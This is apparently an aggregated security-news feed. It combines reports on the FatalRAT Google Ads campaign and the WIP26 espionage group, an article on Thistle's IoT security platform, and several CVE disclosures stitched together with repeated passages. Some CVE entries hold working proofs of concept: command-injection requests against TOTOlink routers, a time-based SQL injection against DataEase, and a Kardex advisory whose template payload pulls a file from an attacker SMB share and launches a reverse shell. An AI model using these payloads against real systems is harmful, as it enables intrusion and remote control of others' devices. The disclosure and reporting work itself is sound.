By Waqas
The primary target of this malware campaign is Chinese-speaking users in East and Southeast Asia.
This is a post from HackRead.com Read the original post: Google Ads drop FatalRAT malware from fake messenger, browser apps

Find out how Google Ads have been spreading FatalRAT malware recently in fake utility, messenger and browser apps. Learn more about this alarming security issue and how to protect yourself.

Researchers from the Slovak cybersecurity firm ESET have discovered a new malware campaign targeting Chinese-speaking users in East and Southeast Asia.

According to a report published by ESET researchers, hackers are delivering remote access Trojans hidden inside **malicious Google ads**. These misleading ads appear in Google search results and download Trojans installers.

This should not come as a surprise, as Google Ads and **Google Adsense** have been abused lately to deliver malware around the world.

Researchers at ESET noted that the attackers remain unidentified. However, it is confirmed that they are targeting Chinese-speaking individuals. They have designed fake websites that look identical to popular apps like WhatsApp, Firefox, or Telegram.

Through these websites, the attackers deliver remote access Trojans, such as FatalRAT, first detected by AT&T researchers in 2021, to hijack the infected device. Some of the spoofed apps include:

*   LINE
*   Signal
*   Skype
*   Youdao
*   Electrum
*   Telegram
*   WhatsApp
*   WPS Office
*   Mozilla Firefox
*   Google Chrome
*   Sogou Pinyin Method

Researchers discovered the attacks between August 2022 and January 2023. The attack starts by purchasing an ad slot appearing in **Google search results**.

“The attackers purchased advertisements to position their malicious websites in the “sponsored” section of Google search results. We reported these ads to Google, and they were promptly removed,” researchers explained.

Users who search for popular apps are directed to rogue websites with typosquatting domains that host trojanized installers. These installers install the actual app as the user requires, to avoid raising suspicion.

Fake Google Chrome and Telegram websites spreading fake installers infected with FatalRat malware

The FatalRAT malware used in this campaign contains numerous commands to manipulate data from various browsers.

“The websites and installers downloaded from them are mostly in Chinese and in some cases falsely offer Chinese language versions of software that is not available in China,” researchers wrote in their technical report published today.

The downloaded installers aren’t hosted on the same server as the sites, but in Alibaba Cloud Object Storage Service, and are digitally signed MSI files. The installers were uploaded to the cloud storage on 6th January 2023.

After the malware is deployed, the attacker gains full control of the device and can execute arbitrary shell commands, run executables, steal data from web browsers, and log keystrokes.

This campaign has no specific targets, as the attackers want to steal exclusive user data, such as web credentials, to sell them on underground hacker forums or launch additional cybercrime campaigns. However, in their **report**, ESET researchers noted that most victims were located in the following countries:

*   China
*   Taiwan
*   Japan
*   Malaysia
*   Thailand
*   Indonesia
*   Myanmar
*   Philippines
*   Hong Kong

**Detection and protection from fake malicious installers**

Fake, malicious installers can be a significant threat to your computer and personal data. To detect and protect against them, here are some steps you can take:

*   First and foremost, use common sense when downloading files. Never download software, or anything else, from a third-party site. Download software only from trusted sources: Download software only from reputable websites, and avoid downloading from unverified sources.
*   **Verify the authenticity of the website:** Check the website’s URL for spelling errors, and look for security badges and trust seals on the site. For example, **it’s Google.com, not ɢoogle.com**.
*   **Use reliable anti-virus software:** Use reliable anti-virus software and keep it updated to protect your computer from malicious software.
*   **Read reviews and comments:** Read reviews and comments about the software before downloading it; this will give you an idea of the software’s authenticity.
*   **Scan downloaded files:** Use anti-virus software to scan the downloaded file before installing it. You should also use **VirusTotal** to check whether the file is malicious or if the URL you are about to visit is safe.
*   **Use sandboxing software:** Use sandboxing software that can run the installer in a virtual environment, keeping your system safe from any potential harm.
*   **Enable security features:** Enable security features on your computer, such as a firewall, to prevent unauthorized access to your system.

1.  Jupyter infostealer delivered through MSI installer
2.  Fake Zoom installers infect PCs with RevCode RAT
3.  Fake 1Password installer stealing user extract data
4.  Fake Tor browser installer drop malware via YouTube
5.  Fake Windows 11 installers infecting PCs with adware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Google Ads drop FatalRAT malware from fake messenger, browser apps

Thistle's technology will give device makers a way to easily integrate features for secure updates, memory management, and communications into their products, Snyder says.

Renowned security expert Window Snyder, whose experience includes helping companies such as Apple, Microsoft, and Mozilla bolster the security of their products, is betting she can do the same thing for IoT device manufacturers.

Snyder's company Thistle Technologies today is making generally available a new platform that aims to help IoT manufacturers securely deploy updates and implement capabilities for secure communications and memory management into their devices. The new Thistle Security Platform will give development teams working for embedded device manufacturers a way to directly incorporate security functionality into their products during the build phase.

**Crucial Capabilities**

Snyder says the technology is crucial because embedded devices are like fully functional computers that face the same kind of threats that operating systems and applications software do, but often don't have basic security mechanisms for protecting against them.

"What we are trying to do is democratize security," says Snyder, who launched Thistle in early 2021 after a stint as chief security officer at financial technology company Square. The goal is to give IoT and embedded device makers an infrastructure for quickly adding security functions to their devices without needing to develop it themselves. "These devices have all the same type of threats that general purpose operating systems have but with a lot less security," she says.

Thistle's set of security tools and services include an update component, a memory allocator, and an integrated memory-safe Transport Layer Security (TLS) stack for secure communications.

The update client, for Linux and Windows-based devices, enables IoT manufacturers to securely deliver signed updates to their device fleet from a single, central location. The updates could include new device features, security functions, and vulnerability fixes. It includes a failover feature that allows a device to return to a last known good state--without having to reboot—in case an update creates problems. The update client also supports vulnerability monitoring and access control capabilities. Thistle's memory allocator manages device memory in such a way as to mitigate buffer overflows and other common memory-related issues.

**Automated Updates**

When implemented, Thistle's technology will enable IoT devices to receive automated updates in much the same way that general-purpose operating systems and applications receive updates. When a vulnerability surfaces in a product, or new functionality becomes available for it, the device manufacturer then can securely push the update out centrally to all installed devices, thereby eliminating the need for manual intervention.

In her various stints as a senior security executive at some of the world's largest technology companies, Snyder has contributed to advances in areas such as secure software development lifecycles, memory management ,and attack surface reduction.

She perceives the technology her company is now bringing to the IoT market as giving resource-strapped device manufacturers a way to integrate baseline security features—such as encrypted communications and memory management capabilities—into their devices. Her hope is that device makers will then leverage her company's platform to build on those features going forward.

Thistle's immediate focus will be on IoT players in key markets such as automotive, power, water, networking, and the industrial sector.

Update mechanisms—when they exist—in the IoT space can be buggy and unreliable, Snyder says. She points to multiple incidents when a bad update bricked a device or caused other problems. One example: a 2017 incident where a bad firmware update bricked hundreds of smart locks from Lockstate that Airbnb was using as part of a program for its hosts. There have been other instances where key fobs and even cars have been bricked because of a faulty update, Snyder notes.

"The tolerance for update mechanisms is incredibly low," Snyder says. "When you have really low tolerance for update failures, you need to have an update mechanism that is highly reliable in addition to being supported."

**Integration with Build Environments**

The new Thistle security platform integrates with build environments and provides developers with tools such as those for integrating Thistle's security features into their devices and for things like signing and processing updates. Thistle's platform integrates with the open-source Yocto build system, which allows developers to add features to Linux products relatively quickly. It also integrates with the OpenWrt router operating system and with the U-Boot open-source bootloader.

Christ Wysopal, founder and chief technology officer at Veracode and seed investor in Thistle, says many of the capabilities that the company is making available are new to the space -- especially among smaller IoT device makers. The technology should help embedded device makers implement a secure by design approach where key security features get integrated into the product.

"Thistle is making it easier for people to incorporate this technology at a price point they can afford," Wysopal says. "It is changing the market by making security functionality available where it wasn't before."

Thistle's platform launch comes at a time when interest in technologies for securely updating IoT devices appears to be increasing. In recent years, vendors and security researchers have been reporting a growing number of vulnerabilities in IoT products.

A report from Claroty last year showed that in the first half of 2022, IoT vulnerabilities accounted for 15% of all vulnerabilities in the so-called Extended IoT (XIoT) compromised of all connected cyber-physical systems. In the previous six-month period, IoT vulnerabilities accounted for just 9% of all XIoT vulnerabilities.

**Pressure Mounts on Device Makers**

The trend is significant because organizations across industries such as transportation, telecommunications, manufacturing, and other sectors are connecting all sorts of embedded devices to their networks to support digital transformation and operational requirements.

"The devices have a unique profile because they are not a general-purpose computer and yet they have a processor, memory, are connected to the network and a lot of the time are doing something critical," Wysopal says.

He expects that enterprise organizations are going to increasingly demand better security capabilities from their IoT suppliers. The availability of technologies like that from Thistle is going to make it harder for device manufacturers to explain away their failure to implement fundamental security mechanisms in their products, Wysopal says.

Just this week the National Institute of Standards and Technology released a new encryption standard for IoT devices, which means enterprise organizations and consumers could soon begin expecting device makers to implement it in their products.

Measures like the Internet of Things Cybersecurity Improvement Act of 2020 are another factor because they require organizations selling IoT devices to government agencies to ensure minimum security standards for their technologies.

Embedded and IoT device makers are feeling more pressure than before to respond to security threats, Snyder says.

"Customers are also asking better questions and there have been more and more demonstrations over time that these devices are deeply vulnerable," she says.

Window Snyder's Start-up Launches Security Platform for IoT Device Makers

TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the province parameter at setting/delStaticDhcpRules.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取province参数下的内容传递给v11，之后将v11带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules”,
"province":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-24236: ttt/19 at main · Am1ngl/ttt

TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the city parameter at setting/delStaticDhcpRules.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取city参数下的内容传递给v12，之后将v12带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"city":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-24238: ttt/20 at main · Am1ngl/ttt

Ricoh mp_c4504ex devices with firmware 1.06 mishandle credentials.

Supported languages

English, French, German, Italian, Spanish, Portuguese, Dutch, Danish, Norwegian, Finnish, Swedish, Polish, Czech, Hungarian, Catalan, Turkish, Russian, Greek, Brazilian Portuguese, Simplified Chinese, Traditional Chinese, Korean, Japanese

\* Multi-Lingual User Interface Display language is changed in accordance with Windows locale setting. If the locale setting is not included in “Support Language”, the display language is shown in English.

\* Device Software Manager has an issue in a Russian language environment with the multilingual version and cannot be installed. We are currently considering how to fix this.

CVE-2022-43969: Device Software Manager

Chinese-speaking individuals in Southeast and East Asia are the targets of a new rogue Google Ads campaign that delivers remote access trojans such as FatalRAT to compromised machines.
The attacks involve purchasing ad slots to appear in Google search results that direct users searching for popular applications to rogue websites hosting trojanized installers, ESET said in a report published

Chinese-speaking individuals in Southeast and East Asia are the targets of a new rogue Google Ads campaign that delivers remote access trojans such as FatalRAT to compromised machines.

The attacks involve purchasing ad slots to appear in Google search results that direct users searching for popular applications to rogue websites hosting trojanized installers, ESET said in a report published today. The ads have since been taken down.

Some of the spoofed applications include Google Chrome, Mozilla Firefox, Telegram, WhatsApp, LINE, Signal, Skype, Electrum, Sogou Pinyin Method, Youdao, and WPS Office.

"The websites and installers downloaded from them are mostly in Chinese and in some cases falsely offer Chinese language versions of software that is not available in China," the Slovak cybersecurity firm said, adding it observed the attacks between August 2022 and January 2023.

A majority of the victims are located in Taiwan, China, and Hong Kong, followed by Malaysia, Japan, the Philippines, Thailand, Singapore, Indonesia, and Myanmar.

The most important aspect of the attacks is the creation of lookalike websites with typosquatted domains to propagate the malicious installer, which, in an attempt to keep up the ruse, installs the legitimate software, but also drops a loader that deploys FatalRAT.

In doing so, it grants the attacker complete control of the victimized computer, including executing arbitrary shell commands, running files, harvesting data from web browsers, and capturing keystrokes.

"The attackers have expended some effort regarding the domain names used for their websites, trying to be as similar to the official names as possible," the researchers said. "The fake websites are, in most cases, identical copies of the legitimate sites."

The findings arrive less than a year after Trend Micro disclosed a Purple Fox campaign that leveraged tainted software packages Adobe, Google Chrome, Telegram, and WhatsApp as an arrival vector to propagate FatalRAT.

They also arrive amid a broader abuse of Google Ads to serve a wide range of malware, or alternatively, take users to credential phishing pages.

In a related development, Symantec's Threat Hunter Team shed light on another malware campaign that targets entities in Taiwan with a previously undocumented .NET-based implant dubbed Frebniis.

"The technique used by Frebniis involves injecting malicious code into the memory of a DLL file (iisfreb.dll) related to an IIS feature used to troubleshoot and analyze failed web page requests," Symantec said.

"This allows the malware to stealthily monitor all HTTP requests and recognize specially formatted HTTP requests sent by the attacker, allowing for remote code execution."

The cybersecurity firm, which attributed the intrusion to an unknown actor, said it's currently not known how access to the Windows machine running the Internet Information Services (IIS) server was obtained.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Using Google Ads to Spread FatalRAT Malware Disguised as Popular Apps

Telecommunication service providers in the Middle East are being targeted by a previously undocumented threat actor as part of a suspected espionage-related campaign.
Cybersecurity firms SentinelOne and QGroup are tracking the activity cluster under the former's work-in-progress moniker WIP26.
"WIP26 relies heavily on public cloud infrastructure in an attempt to evade detection by making

Cloud Security / Cyber Threat

Telecommunication service providers in the Middle East are being targeted by a previously undocumented threat actor as part of a suspected espionage-related campaign.

Cybersecurity firms SentinelOne and QGroup are tracking the activity cluster under the former's work-in-progress moniker **WIP26**.

"WIP26 relies heavily on public cloud infrastructure in an attempt to evade detection by making malicious traffic look legitimate," researchers Aleksandar Milenkoski, Collin Farr, and Joey Chen said in a report shared with The Hacker News.

This includes the misuse of Microsoft 365 Mail, Azure, Google Firebase, and Dropbox for malware delivery, data exfiltration, and command-and-control (C2) purposes.

The initial intrusion vector used in the attacks entails "precision targeting" of employees via WhatsApp messages that contain links to Dropbox links to supposedly benign archive files.

The files, in reality, harbor a malware loader whose core feature is to deploy custom .NET-based backdoors such as CMD365 or CMDEmber that leverage Microsoft 365 Mail and Google Firebase for C2.

"The main functionality of CMD365 and CMDEmber is to execute attacker-provided system commands using the Windows command interpreter," the researchers said. "This capability was used to conduct a variety of activities, such as reconnaissance, privilege escalation, staging of additional malware, and data exfiltration."

CMD365, for its part, works by scanning the inbox folder for specific emails that begin with the subject line "input" to extract the C2 commands for execution on the infected hosts. CMDEmber, on the other hand, sends and receives data from the C2 server by issuing HTTP requests.

Transmitting the data – which comprises users' private web browser information and details about high-value hosts in the victim's network – to actor-controlled Azure instances is orchestrated by means of PowerShell commands.

The abuse of cloud services for nefarious ends is not unheard of, and the latest campaign from WIP26 indicates continued attempts on the part of threat actors to evade detection.

This is also not the first time telecom providers in the Middle East have come under the radar of espionage groups. In December 2022, Bitdefender disclosed details of an operation dubbed **BackdoorDiplomacy** aimed at a telecom company in the region to siphon valuable data.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Threat Actor WIP26 Targeting Telecom Service Providers in the Middle East

SQL Injection vulnerability in file home\controls\cart.class.php in UQCMS 2.1.3, allows attackers execute arbitrary commands via the cookie_cart parameter to /index.php/cart/num.

CVE-2020-21120: SQL Injection Prevention - OWASP Cheat Sheet Series

SQL Injection vulnerability in dataease before 1.2.0, allows attackers to gain sensitive information via the orders parameter to /api/sys_msg/list/1/10.

\*\*DataEase \*\*  
1.1.0-rc2

**Bug 描述**  
SQL Injection

\*\*Bug \*\*  
url:/api/sys\_msg/list/1/10

    POST /api/sys_msg/list/1/10 HTTP/1.1
    Host: demo.dataease.io
    Cookie: sysUiInfo={%22ui.logo%22:{%22paramKey%22:%22ui.logo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:1%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginLogo%22:{%22paramKey%22:%22ui.loginLogo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:2%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginImage%22:{%22paramKey%22:%22ui.loginImage%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:3%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginTitle%22:{%22paramKey%22:%22ui.loginTitle%22%2C%22paramValue%22:%22%E4%BA%BA%E4%BA%BA%E5%8F%AF%E7%94%A8%E7%9A%84%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%8F%AF%E8%A7%86%E5%8C%96%E5%88%86%E6%9E%90%E5%B7%A5%E5%85%B7%22%2C%22type%22:%22text%22%2C%22sort%22:4%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.title%22:{%22paramKey%22:%22ui.title%22%2C%22paramValue%22:%22%22%2C%22type%22:%22text%22%2C%22sort%22:5%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.favicon%22:{%22paramKey%22:%22ui.favicon%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:6%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.demo.tips%22:{%22paramKey%22:%22ui.demo.tips%22%2C%22paramValue%22:%22user:%20demo%20password:%20dataease%22%2C%22type%22:%22text%22%2C%22sort%22:100%2C%22file%22:null%2C%22fileName%22:null}}; language=zh_CN; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Length: 65
    Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
    Link-Pwd-Token: undefined
    Accept-Language: zh-CN
    Sec-Ch-Ua-Mobile: ?0
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Type: application/json;charset=UTF-8
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Origin: https://demo.dataease.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.dataease.io/?
    Accept-Encoding: gzip, deflate
    Connection: close
    
    {"orders":["(select*from(select+sleep(10)union/**/select+1)a) "]}
    

  
  
payload：extractvalue('anything',concat('~',(select database())))

CVE-2021-38239: [Bug]SQL Injection · Issue #510 · dataease/dataease

Kardex Mlog MCC 5.7.12+0-a203c2a213-master allows remote code execution. It spawns a web interface listening on port 8088. A user-controllable path is handed to a path-concatenation method (Path.Combine from .NET) without proper sanitisation. This yields the possibility of including local files, as well as remote files on SMB shares. If one provides a file with the extension .t4, it is rendered with the .NET templating engine mono/t4, which can execute code.

Product: Kardex Mlog MCC  
Vendor: Kardex Holding AG  
Tested Version: 5.7.12+0-a203c2a213-master  
Fixed Version: inline patch - no new version number  
Vulnerability Type: Improper Control of Generation of Code ("RFI") - CWE-94  
CVSSv2 Severity: AV:A/AC:L/Au:N/C:C/I:C/A:C (Score 8.3)  
CVSSv3 Severity: AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (Score 9.6)  
Solution Status: fixed Manufacturer Notification: 2022-12-13  
Solution Date: 2023-01-24  
Public Disclosure: 2023-02-07  
CVE Reference: CVE-2023-22855  
Authors of Advisory: Patrick Hener & Nico Viakowski

**Overview\[1\]**

> Kardex Mlog’s modular software solution Kardex Control Center manages material flow and warehouse management processes faster and more efficiently.

> From manual block warehouse and interface networking with intelligent partner systems to an automated intralogistics system connected to production lines and driverless vehicles, intelligent energy management for the automated stacker cranes and modern system visualization, the Kardex Control Center modules offer flexible solutions for your warehouse management.

**Vulnerability Details**

The .NET based software spawns a web interface listening on port 8088. This interface is meant to control and monitor the material flow.

The user controllable path is handed to a path concatenation function (Path.Combine) without proper sanitization. This yields the possibility to include local files, as well as remote files (SMB). The path is used in a function called getFile.

The following code snippet shows the vulnerable part of this function:

public MccHttpServerResult GetFile(string path, string acceptEncoding, string queryString \= null)
		{
			MccHttpServerResult result4;

\[... snip ...\]

else
	{
		string getfileName \= (path \== "/") ? "index.html" : path.Substring(1).Replace("/", Path.DirectorySeparatorChar.ToString(CultureInfo.InvariantCulture));
		string fileName \= Path.Combine(this.RootDirectory(), getfileName);
		string originalFileName \= fileName;

The .Net function Path.Combine also is able to concatenate remote targets. For example using \\ipaddress you can include files from a remote samba server.

Further down the request flow, the application is checking for the MIME type of the file retrieved.

Depending on the MIME type the content is either sent through a import/export procedure or rendered as mono/t4 template. The function getMimeType will return t4 if the included file is ending with an extension of .t4.

This is where the File Inclusion can be escalated to a Remote Code Execution. The mono/t4 templating engine allows the use of C# to evaluate code. This enables an attacker to gain code execution and eventually spawn a reverse shell.

bool flag15 \= File.Exists(fileName);
	if (flag15)
		{
			using (FileStream f \= new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
			{
				byte\[\] bytes \= new byte\[f.Length\];
				f.Read(bytes, 0, bytes.Length);
				bool flag16 \= mime2 \== "t4";
				if (flag16)
					{
						return this.runTemplatingEngine(bytes, responseHeaders, queryString);
					}

**Proof of Concept (PoC)**

The following request will include a remote file from an smb share. For this to work the attacker has to spawn an smb server (for example using smbserver.py from Impacket\[2\]).

    GET /\\attacker-ip/share/exploit.t4 HTTP/1.1
    Host: vulnearble.host.internal:8088
    Content-Type: text/html
    User-Agent: curl/7.86.0
    Accept: */*
    Connection: close
    

The exploit.t4 looks like this:

<#@ template language="C#" #\>
<#@ Import Namespace="System" #\>
<#@ Import Namespace="System.Diagnostics" #\>

Proof of Concept - SSTI to RCE
RCE running ...

<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e revshell-base64-blob";

proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\\Windows\\System32";
proc1.FileName = @"C:\\Windows\\System32\\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#\>

Enjoy your shell, good sir :D

The exploit above will execute cmd.exe and launch a powershell to execute a reverse shell. You can easily generate a reverse shell blob using revshells.com\[3\].

A full exploit spawning a reverse shell was created\[4\].

**Solution**

The user supplied data should be sanitized before using it in the Path.Combine function.

**Disclosure Timeline**

2022-12-13: Vulnerability discovered  
2022-12-13: Vulnerability reported to manufacturer  
2023-01-24: Solution provided by manufacturer  
2023-02-07: Public disclosure of vulnerability

**References**

\[1\] Vendor Website: https://www.kardex.com/en/mlog-control-center  
\[2\] Impacket Git Repository: https://github.com/SecureAuthCorp/impacket  
\[3\] Reverse Shell Generator: https://www.revshells.com/  
\[4\] Exploit on Exploit-DB (tbd): https://www.exploit-db.com/exploits/xxxxx  
\[5\] Blog Post Advisory: https://hesec.de/posts/CVE-2023-22855  
\[6\] Personal Github Repo for Advisory: https://github.com/patrickhener/CVE-2023-22855  
\[7\] Blog Post Thinking Objects: https://to.com/blog/advisory-kardex-mlog-CVE-2023-22855

**Credits**

This security vulnerability was found by Patrick Hener and Nico Viakowski.

E-Mail: patrickhener@posteo.de  
E-Mail: n.viakowski@pm.me

**Disclaimer**

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.

**Copyright**

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Tag

#windows